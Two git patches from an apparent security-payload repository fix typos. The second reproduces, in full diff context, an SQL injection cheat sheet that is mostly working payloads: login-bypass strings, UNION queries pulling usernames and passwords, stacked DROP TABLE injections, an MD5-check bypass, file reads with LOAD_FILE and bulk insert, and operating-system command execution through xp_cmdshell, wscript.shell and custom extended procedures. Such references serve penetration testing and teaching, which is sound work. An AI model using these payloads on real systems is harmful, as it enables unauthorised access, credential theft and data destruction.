Subject: [PATCH 49/59] spelling: should

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 discovery/WebSocket/WebSocket-subprotocols.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/discovery/WebSocket/WebSocket-subprotocols.txt b/discovery/WebSocket/WebSocket-subprotocols.txt
index f83b4e98..63e0815b 100644
--- a/discovery/WebSocket/WebSocket-subprotocols.txt
+++ b/discovery/WebSocket/WebSocket-subprotocols.txt
@@ -6,7 +6,7 @@
 # The Web Socket client can include a list of the protocols when making the initial HTTP request. 
 # The server is then required to either select one of those protocols and include it in a response header.
 # If none of the sub protocols send by the client are supported by the server, 
-# the server shoud fail the handshake and terminate the connection.
+# the server should fail the handshake and terminate the connection.
 MBWS.huawei.com
 MBLWS.huawei.com
 soap

From e94df76fb542943fc743a6705cd6edf18db6b962 Mon Sep 17 00:00:00 2001
From: Josh Soref <jsoref@users.noreply.github.com>
Date: Sun, 5 Sep 2021 20:54:32 -0400
Subject: [PATCH 50/59] spelling: similar

Signed-off-by: Josh Soref <jsoref@users.noreply.github.com>
---
 docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
index e08b0043..9f5507d9 100644
--- a/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
+++ b/docs/attack-docs/sqli/docs.sql_injection_cheatsheet.html
@@ -43,7 +43,7 @@ <h1><a href="/sql-injection-cheatsheet-oku/">SQL Injection Cheat Sheet</a></h1>
         <a href="/tag/sql+injection/" class="tag">sql injection</a>, <a href="/tag/security/" class="tag">security</a>, <a href="/tag/web+application+security/" class="tag">web application security</a>, <a href="/tag/web+uygulamasi+guvenligi/" class="tag">web uygulamasi guvenligi</a>, <a href="/tag/english/" class="tag">english</a>,  <span class="date">15.03.2007</span>
     </div>
 <!--<div style="float:right"><script type="text/javascript" src="http://yakutum.pasaj.com/widgetjs"></script></div>-->
-    <div class="post"><p> </p>  <h2><em>Find and exploit SQL Injections with <a href="http://www.mavitunasecurity.com/">Netsparker, Next Generation Web Application Security Scanner</a></em></h2>  <p> </p>  <p><em>SQL Injection Cheat Sheet, <strong>Document Version 1.4</strong></em></p>  <h2><a id="about" name="about"></a>About SQL Injection Cheat Sheet </h2>  <p>Currently only for <strong>MySQL</strong> and <strong>Microsoft SQL Server, </strong>some <strong>ORACLE</strong> and some <strong>PostgreSQL</strong>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.     <br />    <br />Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </p>  <table  cellspacing="3" cellpadding="3"><tbody>     <tr>       <td align="right"><strong>M : </strong></td>        <td>MySQL </td>     </tr>      <tr>       <td align="right"><strong>S : </strong></td>        <td>SQL Server</td>     </tr>      <tr>       <td align="right"><strong>P : </strong></td>        <td>PostgreSQL</td>     </tr>      <tr>       <td align="right"><strong>O : </strong></td>        <td>Oracle</td>     </tr>      <tr>       <td align="right"><strong>+ : </strong></td>        <td>Possibly all other databases </td>     </tr>   </tbody></table>  <h5><em><strong>Examples;</strong></em></h5>  <ul>   <li><em>(MS) means : MySQL and SQL Server etc. </em></li>    <li>(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </li> </ul>  <h2><a id="TOC" name="TOC"></a>Table Of Contents </h2>  <ol>   <li><a href="#about">About SQL Injection Cheat Sheet </a></li>    <li><a href="#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </a>      <ol>       <li><a href="#LineComments">Line Comments </a>          <ul>           <li><a href="#LineCommentAttacks">SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#InlineComments">Inline Comments </a>          <ul>           <li><a href="#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</a> </li>            <li><a href="#MySQLInlineSamples">MySQL Version Detection Sample Attacks</a> </li>         </ul>       </li>        <li><a href="#StackingQueries">Stacking Queries</a>           <ul>           <li><a href="#LangDbFigure">Language / Database Stacked Query Support Table </a></li>            <li><a href="#AboutMySQLandPHP">About MySQL and PHP</a> </li>            <li><a href="#StackedSamples">Stacked SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#IfStatements">If Statements</a>           <ul>           <li><a href="#MySQLIf">MySQL If Statement</a> </li>            <li><a href="#SQLServerIf">SQL Server If Statement </a></li>            <li><a href="#SampleIfStatements">If Statement SQL Injection Attack Samples </a></li>         </ul>       </li>        <li><a href="#UsingIntegers">Using Integers </a></li>        <li><a href="#StringOperations">String  Operations</a>           <ul>           <li><a href="#StringConcat">String Concatenation </a></li>         </ul>       </li>        <li><a href="#StringwithoutQuotes">Strings without Quotes</a>           <ul>           <li><a href="#HexbasedSamples">Hex based SQL Injection Samples</a> </li>         </ul>       </li>        <li><a href="#StringModification">String Modification & Related </a></li>        <li><a href="#UnionInjections">Union Injections</a>           <ul>           <li><a href="#UnionLanguageIssues">UNION – Fixing Language Issues</a> </li>         </ul>       </li>        <li><a href="#ByPassingLoginScreens">Bypassing Login Screens</a> </li>        <li><a href="#Enablecmdshell">Enabling xp_cmdshell in SQL Server 2005 </a></li>        <li><em>Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see. </em></li>     </ol>   </li> </ol>  <h2><a id="SyntaxBasicAttacks" name="SyntaxBasicAttacks"></a>Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </h2>  <h3 class="style2"><a id="21" name="21"></a>Ending / Commenting Out / Line Comments </h3>  <h4><a id="LineComments" name="LineComments"></a>Line Comments </h4>  <p class="idea"><strong>Comments out rest of the query.</strong>     <br />Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.</p>  <ul type="disc">   <li><code>-- </code>(SM)<code>        <br />DROP sampletable;<span class="hi">--</span>         <br />        <br /></code></li>    <li><code># </code>(M)<code>        <br />DROP sampletable;<span class="hi">#</span></code> </li> </ul>  <h5><a id="LineCommentAttacks" name="LineCommentAttacks"></a>Line Comments Sample SQL Injection Attacks</h5>  <ul type="disc">   <li><span class="inputfield">Username:</span><code> admin<span class="hi">'--</span> </code></li>    <li><code>SELECT * FROM members WHERE username = '<span class="hi">admin'--</span><span class="comment">' AND password = 'password'</span>         <br /></code><span class="idea">This is going to log you as admin user, because rest of the SQL query will be ignored.</span> </li> </ul>  <h4><a id="InlineComments" name="InlineComments"></a>Inline Comments</h4>  <p class="idea"><strong>Comments out rest of the query by not closing them</strong> or you can use for <strong>bypassing blacklisting</strong>, removing spaces, obfuscating and determining database versions.</p>  <ul type="disc">   <li><code>/*Comment Here*/</code> (SM)       <ul>       <li><code>DROP<span class="hi">/*comment*/</span>sampletable</code> </li>        <li><code>DR<span class="hi">/**/</span>OP<span class="hi">/*bypass blacklisting*/</span>sampletable</code> </li>        <li><code>SELECT<span class="hi">/*avoid-spaces*/</span>password<span class="hi">/**/</span>FROM<span class="hi">/**/</span>Members</code>           <br />          <br /></li>     </ul>   </li>    <li><code>/*! MYSQL Special SQL *</code>/ (M)       <br /><span class="idea">This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.</span>       <br />      <br /><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code> </li> </ul>  <h5><a id="InlineSamples" name="InlineSamples"></a>Classical Inline Comment SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10; DROP TABLE members <span class="hi">/*</span></code>       <br /><span class="idea">Simply get rid of other stuff at the end the of query. Same as <code>10; DROP TABLE members <span class="hi">--</span></code></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h5><a id="MySQLInlineSamples" name="MySQLInlineSamples"></a>MySQL Version Detection Sample Attacks</h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <span class="hi"><code>/*!</code></span><code><strong>32302</strong> 10<span class="hi">*/</span> </code></li>    <li><span class="inputfield">ID:</span> <code>10</code>       <br /><span class="idea">You will get the <strong>same response</strong> if MySQL version is higher than <strong>3.23.02</strong></span>       <br />      <br /></li>    <li><code>SELECT <span class="hi">/*!<strong>32302</strong> 1/0, */</span> 1 FROM tablename</code>       <br /><span class="idea">Will throw an <strong>division by 0 error </strong>if MySQL version is higher than <strong>3.23.02</strong></span> </li> </ul>  <h3><a id="StackingQueries" name="StackingQueries"></a>Stacking Queries </h3>  <p class="idea"><strong>Executing more than one query in one transaction</strong>. This is very useful in every injection point, especially in SQL Server back ended applications. </p>  <ul type="disc">   <li><code>;</code> (S)       <br /><code>SELECT * FROM members<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">Ends a query and starts a new one.</p>  <h4><a id="LangDbFigure" name="LangDbFigure"></a>Language / Database Stacked Query Support Table </h4>  <p class="idea"><strong>green:</strong> supported, <strong>dark gray:</strong> not supported, <strong>light gray: </strong>unknown </p>  <table  cellspacing="1" cellpadding="5" bgcolor="#cccccc"><tbody>     <tr>       <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#ffffff"><strong>SQL Server </strong></td>        <td bgcolor="#ffffff"><strong>MySQL</strong></td>        <td bgcolor="#ffffff"><strong>PostgreSQL</strong></td>        <td bgcolor="#ffffff"><strong>ORACLE</strong></td>        <td bgcolor="#ffffff"><strong>MS Access </strong></td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>ASP.NET</strong></td>        <td bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>PHP</strong></td>        <td bgcolor="#99cc00"> </td>        <td bgcolor="#333333"> </td>        <td class="style3" bgcolor="#99cc00"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>     </tr>      <tr>       <td bgcolor="#ffffff"><strong>Java</strong></td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td class="style3" bgcolor="#f7f7f7"> </td>        <td bgcolor="#333333"> </td>        <td bgcolor="#333333"> </td>     </tr>   </tbody></table>  <p class="idea"> </p>  <p class="idea"><strong><a id="AboutMySQLandPHP" name="AboutMySQLandPHP"></a>About MySQL and PHP;</strong>     <br />To clarify some issues;     <br /><strong>PHP - MySQL doesn't support stacked queries</strong>, Java doesn't support stacked queries (<em>I'm sure for ORACLE, not quite sure about other databases</em>). <em>Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?</em></p>  <h5><a id="StackedSamples" name="StackedSamples"></a>Stacked SQL Injection Attack Samples </h5>  <ul type="disc">   <li><span class="inputfield">ID:</span> <code>10;DROP members --</code> </li>    <li><code>SELECT * FROM products WHERE id = 10<span class="hi">; DROP members--</span></code> </li> </ul>  <p class="idea">This will run <em>DROP members</em> SQL sentence after normal SQL Query.     <br /></p>  <h3><a id="IfStatements" name="IfStatements"></a>If Statements </h3>  <p class="idea">Get response based on a if statement. This is <strong>one of the key points of Blind SQL Injection</strong>, also can be very useful to test simple stuff blindly and <strong>accurately</strong>.</p>  <h4><a id="MySQLIf" name="MySQLIf"></a>MySQL If Statement</h4>  <ul>   <li><code>IF(<strong><em>condition</em>,<em>true-part</em>,<em>false-part</em></strong>) </code>(M)<code>        <br />SELECT IF(1=1,'true','false')</code> </li> </ul>  <h4><a id="SQLServerIf" name="SQLServerIf"></a>SQL Server If Statement </h4>  <ul>   <li><code>IF <strong><em>condition</em></strong> <strong><em>true-part</em></strong> ELSE <strong><em>false-part</em></strong></code> (S)       <br /><code>IF (1=1) SELECT 'true' ELSE SELECT 'false'</code> </li> </ul>  <h5><a id="SampleIfStatements" name="SampleIfStatements"></a>If Statement SQL Injection Attack Samples </h5>  <p><code>if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0</code> (S)     <br /><span class="idea">This will throw an <strong>divide by zero error</strong> if current logged user is not <strong>"sa" or "dbo"</strong>.</span></p>  <h3><a id="UsingIntegers" name="UsingIntegers"></a>Using Integers </h3>  <p class="idea">Very useful for bypassing, <strong>magic_quotes() and similar filters</strong>, or even WAFs. </p>  <ul type="disc">   <li><code>0x<em>HEXNUMBER</em></code> (SM)       <br /><span class="idea">You can  write hex like these;</span>       <br />      <br /><code>SELECT CHAR(0x66)</code> (S)       <br /><code>SELECT 0x5045</code> <span class="idea">(<em>this is not an integer it will be a string from Hex</em>)</span> (M)       <br /><code>SELECT 0x50 + 0x45</code> <span class="idea">(<em>this is integer now!</em>)</span> (M) </li> </ul>  <h3><a id="StringOperations" name="StringOperations"></a>String  Operations </h3>  <p class="idea">String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.</p>  <h4><a id="StringConcat" name="StringConcat"></a>String Concatenation </h4>  <ul type="disc">   <li><code>+</code> (S)       <br /><code>SELECT login <span class="hi">+ '-' +</span> password FROM members</code>       <br />      <br /></li>    <li><code>||</code> (*MO)       <br /><code>SELECT login <span class="hi">|| '-' ||</span> password FROM members </code></li> </ul>  <p class="idea"><strong>*About MySQL "||";</strong>     <br />If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using <code>CONCAT()</code> function in MySQL.</p>  <ul type="disc">   <li><code>CONCAT(str1, str2, str3, ...)</code> (M)       <br /><span class="idea">Concatenate supplied strings.</span>       <br /><code>SELECT <span class="hi">CONCAT(login, password)</span> FROM members</code> </li> </ul>  <h3><a id="StringwithoutQuotes" name="StringwithoutQuotes"></a>Strings without Quotes </h3>  <p class="idea">These are some direct ways to using strings but it’s always possible to use <code>CHAR()</code>(MS) and <code>CONCAT()</code>(M) to generate string without quotes.</p>  <ul type="disc">   <li><code>0x457578</code> (M) - <span class="idea">Hex Representation of string </span>      <br /><code>SELECT 0x457578</code>       <br /><span class="idea">This will be selected as string in MySQL.</span>       <br />      <br /><span class="idea">In MySQL easy way to generate hex representations of strings use this;</span>       <br /><code>SELECT CONCAT('0x',HEX('c:\\boot.ini'))</code>       <br />      <br /></li>    <li><span class="idea">Using <code>CONCAT()</code> in MySQL</span>       <br /><code>SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))</code> (M)       <br /><span class="idea">This will return ‘KLM’.</span>       <br />      <br /></li>    <li><code>SELECT CHAR(75)+CHAR(76)+CHAR(77)</code> (S)       <br /><span class="idea">This will return ‘KLM’. </span></li> </ul>  <h4><a id="HexbasedSamples" name="HexbasedSamples"></a>Hex based SQL Injection Samples</h4>  <ul>   <li><code>SELECT LOAD_FILE(<span class="hi">0x633A5C626F6F742E696E69</span>)</code> (M)       <br /><span class="idea">This will show the content of <strong>c:\boot.ini</strong></span> </li> </ul>  <h3><a id="StringModification" name="StringModification"></a>String Modification & Related </h3>  <ul type="disc">   <li><code>ASCII()</code> (SMP)       <br /><span class="idea">Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.</span>       <br />      <br /><code>SELECT ASCII('a')</code>       <br />      <br /></li>    <li><code>CHAR()</code> (SM)       <br /><span class="idea">Convert an integer of ASCII.</span>       <br />      <br /><code>SELECT CHAR(64)</code> </li> </ul>  <h2><a id="UnionInjections" name="UnionInjections"></a>Union Injections</h2>  <p class="idea">With union you do SQL queries cross-table. Basically you can poison query to return records from another table. </p>  <p><code>SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members </code>    <br /><span class="idea">This will combine results from both news table and members table and return all of them. </span></p>  <p><span class="idea">Another Example : </span>    <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>UNION – Fixing Language Issues</h3>  <p class="idea">While exploiting Union injections sometimes you get errors because of different language settings (<em>table settings, field settings, combined table / db settings etc.</em>) these functions are quite useful to fix this problem. It's rare but if you dealing with <em>Japanese, Russian, Turkish</em> etc. applications then you will see it. </p>  <ul>   <li>SQL Server (S)      <br />Use <span class="hi"><code>field</code> <strong><code>COLLATE</code></strong><code> SQL_Latin1_General_Cp1254_CS_AS</code></span> or some other valid one - <em>check out SQL Server documentation</em>.       <br />      <br /><code>SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members</code>       <br />      <br /></li>    <li>MySQL (M)      <br /><code>Hex() </code><span class="idea">for every possible issue</span> </li> </ul>  <h3><a id="ByPassingLoginScreens" name="ByPassingLoginScreens"></a>Bypassing Login Screens (SMO+) </h3> <span class="idea"><em>SQL Injection 101</em>, Login tricks </span>  <ul>   <li><code>admin' -- </code></li>    <li><code>admin' # </code></li>    <li><code>admin'/*</code> </li>    <li><code>' or 1=1--</code> </li>    <li><code>' or 1=1#</code> </li>    <li><code>' or 1=1/*</code> </li>    <li><code>') or '1'='1--</code> </li>    <li><code>') or ('1'='1--</code> </li>    <li>.... </li> </ul>  <ul>   <li>Login as different user (SM*)      <br /><code>' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--</code> </li> </ul>  <p><em>*Old versions of MySQL doesn't support union queries </em></p>  <h3><a id="UnionLanguageIssues" name="UnionLanguageIssues"></a>Bypassing second MD5 hash check login screens </h3>  <p class="idea">If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database. </p>  <h4><a id="BypassingMD5Hash" name="BypassingMD5Hash"></a>Bypassing MD5 Hash Check Example (MSP) </h4>  <p><span class="inputfield">Username :</span><code> admin</code>     <br /><span class="inputfield">Password :</span> <code>1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055</code></p>  <p><code>81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234) </code></p>  <h3> </h3>  <h3>Error Based - Find Columns Names </h3>  <h4>Finding Column Names with <strong>HAVING BY</strong> - Error Based (S) </h4>  <p><em>In the same order, </em></p>  <ul>   <li>'<code> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1</strong> HAVING 1=1 -- </code></li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2</strong> HAVING 1=1 --</code> </li>    <li><code>' GROUP BY <strong class="hi">table.columnfromerror1, columnfromerror2, columnfromerror(n) </strong>HAVING 1=1 --</code> <em>and so on</em> </li>    <li>If you are not getting any more error then it's done. </li> </ul>  <h4>Finding how many columns in SELECT query by <strong>ORDER BY</strong> <strong>(MSO+)</strong></h4>  <p>Finding column number by ORDER BY can speed up the UNION SQL Injection process.</p>  <ul>   <li><code>ORDER BY 1-- </code></li>    <li><code>ORDER BY 2--</code> </li>    <li><code>ORDER BY N--</code> <em>so on</em> </li>    <li>Keep going until get an error. Error means you found the number of selected columns. </li> </ul>  <h3>Data types, UNION, etc. </h3>  <h4>Hints,</h4>  <ul>   <li>Always use <strong>UNION</strong> with <strong>ALL </strong>because of <strong>image</strong> similiar non-distinct field types. By default union tries to get records with distinct. </li>    <li>To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (<em>if injection is in WHERE</em>). This can be critical if you are only getting one result at a time. </li>    <li>Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.      <ul>       <li>Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (<em>because normally developers are not expecting to see NULL in a username field</em>) </li>     </ul>   </li> </ul>  <h4>Finding Column Type </h4>  <ul>   <li><code>' union select <span class="hi">sum(<strong>columntofind</strong>)</span> from <strong>users</strong>--</code> (S)       <br /><code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07'        <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">varchar</strong> data type as an argument.</code>       <br />      <br /><em>If you are not getting error it means </em>column is numeric.       <br />      <br /></li>    <li>Also you can use <span class="hi">CAST()</span> or <span class="hi">CONVERT()</span>       <ul>       <li><code>SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--</code>           <br />          <br /></li>     </ul>   </li>    <li><code>11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error - Syntax is right. MS SQL Server Used. Proceeding.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – First column is an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 -- </code>      <br />Error! – Second column is not an integer.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-</code>       <br />No Error – Second column is a string.       <br />      <br /></li>    <li><code>11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-</code>       <br />Error! – Third column is not an integer. ...       <br />      <br /><code>Microsoft OLE DB Provider for SQL Server error '80040e07'        <br />Explicit conversion from data type <span class="hi"><strong>int</strong> to image</span> is not allowed.</code> </li> </ul>  <p><strong>You’ll get convert() errors before union target errors ! </strong>So<strong> </strong>start with<strong> </strong>convert() then union<strong></strong></p>  <h3>Simple Insert (MSO+) </h3> <code>'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*</code>   <h3>Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes</h3>  <p><strong>@@version</strong> (MS)     <br />Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions. </p>  <p><code>INSERT INTO members(id, user, pass) VALUES(1, ''+<span class="hi">SUBSTRING(@@version,1,10)</span> ,10)</code></p>  <h4><a id="BulkInsert" name="BulkInsert"></a>Bulk Insert (S) </h4>  <p>Insert a file content to a table. If you don't know internal path of web application you can <strong>read IIS (</strong><em>IIS 6 only</em><strong>) metabase file </strong>(<em>%systemroot%\system32\inetsrv\MetaBase.xml</em>) and then search in it to identify application path. </p>  <ol>   <ol>     <li>Create table foo( line varchar(8000) ) </li>      <li>bulk insert foo from 'c:\inetpub\wwwroot\login.asp' </li>      <li><em>Drop temp table, and repeat for another file. </em></li>   </ol> </ol>  <h4>BCP (S) </h4>  <p>Write text file. Login Credentials are required to use this function.    <br /><code>bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar </code></p>  <h4>VBS, WSH in SQL Server (S) </h4>  <p>You can use VBS, WSH scripting in SQL Server because of ActiveX support. </p>  <p><code>declare @o int      <br />exec sp_oacreate 'wscript.shell', @o out       <br />exec sp_oamethod @o, 'run', NULL, 'notepad.exe'       <br /></code><code><em>Username:</em> '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --       <br /></code></p>  <h4>Executing system commands, xp_cmdshell (S) </h4>  <p>Well known trick, By default it's disabled in <em>SQL Server 2005. </em>You need to have admin access. </p>  <p><code>EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'</code>     <br /></p>  <p>Simple ping check (<em>configure your firewall or sniffer to identify request before launch it</em>), </p>  <p><code>EXEC master.dbo.xp_cmdshell 'ping <ip address>'</code></p>  <p>You can not read results directly from error or union or something else. </p>  <h4>Some Special Tables in SQL Server (S) </h4>  <ul>   <li>Error Messages      <br /><code>master..sysmessages </code>      <br />      <br /></li>    <li>Linked Servers      <br /><code>master..sysservers</code>       <br />      <br /></li>    <li>Password (<em>2000 and 20005 both can be crackable, they use very similar hashing algorithm </em>)       <br />SQL Server 2000:<code> masters..sysxlogins</code>       <br />SQL Server 2005 : <code>sys.sql_logins        <br /></code></li> </ul>  <h4>More Stored Procedures for SQL Server (S) </h4>  <ol>   <li>Cmd Execute (<strong>xp_cmdshell</strong>)       <br />exec master..xp_cmdshell 'dir'       <br />      <br /></li>    <li>Registry Stuff (<strong>xp_regread</strong>)       <br />      <ol>       <li>xp_regaddmultistring </li>        <li>xp_regdeletekey </li>        <li>xp_regdeletevalue </li>        <li>xp_regenumkeys </li>        <li>xp_regenumvalues </li>        <li>xp_regread </li>        <li>xp_regremovemultistring </li>        <li>xp_regwrite          <br />exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'           <br />exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'           <br />          <br /></li>     </ol>   </li>    <li>Managing Services (<strong>xp_servicecontrol</strong>)       <br /></li>    <li>Medias (<strong>xp_availablemedia</strong>)       <br /></li>    <li>ODBC Resources (<strong>xp_enumdsn</strong>)       <br /></li>    <li>Login mode (<strong>xp_loginconfig</strong>)       <br /></li>    <li>Creating Cab Files (<strong>xp_makecab</strong>)       <br /></li>    <li>Domain Enumeration (<strong>xp_ntsec_enumdomains</strong>)       <br /></li>    <li>Process Killing (<em>need PID</em>) (<strong>xp_terminate_process</strong>)       <br /></li>    <li>Add new procedure (<em>virtually you can execute whatever you want</em>)       <br />sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’       <br />exec xp_webserver </li>    <li>Write text file to a UNC or an internal path (sp_makewebtask)      <br /></li> </ol>  <h4>MSSQL Bulk Notes </h4>  <p><code>SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/ </code></p>  <p><code>DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0</code></p>  <p>HOST_NAME()    <br />IS_MEMBER (Transact-SQL)  <br />IS_SRVROLEMEMBER (Transact-SQL)  <br />OPENDATASOURCE (Transact-SQL) </p>  <pre>INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"</pre>
+    <div class="post"><p> </p>  <h2><em>Find and exploit SQL Injections with <a href="http://www.mavitunasecurity.com/">Netsparker, Next Generation Web Application Security Scanner</a></em></h2>  <p> </p>  <p><em>SQL Injection Cheat Sheet, <strong>Document Version 1.4</strong></em></p>  <h2><a id="about" name="about"></a>About SQL Injection Cheat Sheet </h2>  <p>Currently only for <strong>MySQL</strong> and <strong>Microsoft SQL Server, </strong>some <strong>ORACLE</strong> and some <strong>PostgreSQL</strong>. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.     <br />    <br />Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself. </p>  <table  cellspacing="3" cellpadding="3"><tbody>     <tr>       <td align="right"><strong>M : </strong></td>        <td>MySQL </td>     </tr>      <tr>       <td align="right"><strong>S : </strong></td>        <td>SQL Server</td>     </tr>      <tr>       <td align="right"><strong>P : </strong></td>        <td>PostgreSQL</td>     </tr>      <tr>       <td align="right"><strong>O : </strong></td>        <td>Oracle</td>     </tr>      <tr>       <td align="right"><strong>+ : </strong></td>        <td>Possibly all other databases </td>     </tr>   </tbody></table>  <h5><em><strong>Examples;</strong></em></h5>  <ul>   <li><em>(MS) means : MySQL and SQL Server etc. </em></li>    <li>(M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server </li> </ul>  <h2><a id="TOC" name="TOC"></a>Table Of Contents </h2>  <ol>   <li><a href="#about">About SQL Injection Cheat Sheet </a></li>    <li><a href="#SyntaxBasicAttacks">Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks </a>      <ol>       <li><a href="#LineComments">Line Comments </a>          <ul>           <li><a href="#LineCommentAttacks">SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#InlineComments">Inline Comments </a>          <ul>           <li><a href="#InlineSamples">Classical Inline Comment SQL Injection Attack Samples</a> </li>            <li><a href="#MySQLInlineSamples">MySQL Version Detection Sample Attacks</a> </li>         </ul>       </li>        <li><a href="#StackingQueries">Stacking Queries</a>           <ul>           <li><a href="#LangDbFigure">Language / Database Stacked Query Support Table </a></li>            <li><a href="#AboutMySQLandPHP">About MySQL and PHP</a> </li>            <li><a href="#StackedSamples">Stacked SQL Injection Attack Samples</a> </li>         </ul>       </li>        <li><a href="#IfStatements">If Statements</a>           <ul>           <li><a href="#MySQLIf">MySQL If Statement</a> </li>            <li><a href="#SQLServerIf">SQL Server If Statement </a></li>            <li><a href="#SampleIfStatements">If Statement SQL Injection Attack Samples </a></li>         </ul>       </li>        <li><a href="#UsingIntegers">Using Integers </a></li>        <li><a href="#StringOperations">String  Operations</a>           <ul>           <li><a href="#StringConcat">String Concatenation </a></li>         </ul>       </li>        <li><a href="#StringwithoutQuotes">Strings without Quotes</a>           <ul>           <li><a href="#HexbasedSamples">Hex based SQL Injection Samples</a> </li>         </ul>       </li>        <li><a href="#StringModification">String Modification & Related </a></li>        <li><a href="#UnionInjections">Union Injections</a>           <ul>           <li><a href="#UnionLanguageIssues">UNION – Fixing Language 